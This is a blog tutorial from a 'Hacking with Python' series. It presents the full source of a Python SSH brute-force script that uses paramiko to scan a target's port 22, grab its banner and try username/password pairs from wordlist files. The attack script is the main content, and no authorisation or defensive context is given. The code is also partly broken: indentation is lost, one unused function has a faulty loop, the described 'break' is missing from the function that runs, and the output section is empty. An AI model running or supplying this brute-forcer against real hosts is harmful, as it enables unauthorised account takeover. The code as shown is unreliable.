This article will guide you to use paramiko library in Python to create an SSH bruteforcing Script. This script is similar to the script we have made on PXSSH, in case you haven’t seen that post, here is the link:
http://www.anonhack.in/2018/06/hacking-with-python-series-ssh-bruteforcing-script-using-pxssh/
If you want to see the usage of paramiko before going through the below script, here is the link:
Making an SSH connection in Python using Paramiko: Hacking with Python Series
Code Explanation:
The code has following functions:
file function which opens the user and password file to read and passes the user and password value to bruteforcing script in loop.
Scan function which scans the host if port 22 is open and grab the banner.
Param_ssh function which makes connection with the SSH,changes the value of found variable if username and password is correct.
Check function enters the program to check whether the number of arguments are correct or not. If arguments are sufficient, it runs other functions in the script.
**NOTE: I have used break in the for loop so that the script stops right when it finds a correct combination, you can remove break so the script will loop through all possible combinations.
Code:
#!/usr/bin/python3
import paramiko
import socket
import sys
import time
#function that runs the paramiko, checks the user and password combination
def param_ssh(ip,user,passw):
global found #found global variable
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print("[?] Trying:"+"-->"+user+":"+passw)
try:
client.connect(ip, username=user, password=passw, look_for_keys=False)
#if connection is made with user and password the value of found is changed to 1.
found=1
except Exception as r:
found=0 #if authentication Exception is generated then the value of found remains 0.[Combination incorrect]
client.close()
#function to read the userfile and passfile and passes their values to the param_ssh function.
def files_read(ip,userfile,passfile):
try:
print("*********** [+] Bruteforcer Running********** ")
with open(userfile) as f1, open(passfile) as f2:
for x, y in zip(f1, f2):
#print("{0}\t{1}".format(x.strip(), y.strip()))
param_ssh(ip,x.strip(),y.strip())
time.sleep(0.1)
#found is the global variable. If user and password are correct then found is not equal to zero.
if(found!=0):
print("\n[+] User and Password Found:\n"+"username:"+x+"password:"+y)
except Exception as f:
print(f)
def asd(ip,userfile,passfile):
try:
print("*********** [+] Bruteforcer Running********** ")
u=open(userfile,'r')
p=open(passfile,'r')
for uline,pline in u.readlines(),p.readline():
print(uline,pline)
param_ssh(ip,uline.rstrip(),pline.rstrip())
#found is the global variable. If user and password are correct then found is not equal to zero.
if(found!=0):
print("\n[+] User and Password Found:\n"+"username:"+uline+"password:"+pline)
break
except Exception as f:
print(f)
u.close() #closes user file
p.close() #closes password file
#scan function to check the target ip with 22 and grab banner. [Extra Function]
def scan(addr,userfile,passfile):
try:
addr=sys.argv[1]
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
ip=socket.gethostbyname(addr)
r=sock.connect_ex((ip,22))
if(r==0):
print("TARGET IP: "+ip)
print("[+] PORT 22 is open")
bann=sock.recv(1024)
detailbann=bann.decode('utf-8').strip()
print("[+] TARGET BANNER: "+detailbann)
files_read(ip,userfile,passfile)
else:
print("[-] "+addr+" PORT is Closed")
exit()
except Exception as e:
print(e)
def check():
if len(sys.argv) < 4: print('Not enough arguments\n>>hostname,username,password required.')
else:
address=sys.argv[1]
userfile=sys.argv[2]
passfile=sys.argv[3]
scan(address,userfile,passfile)
check()OUTPUT:
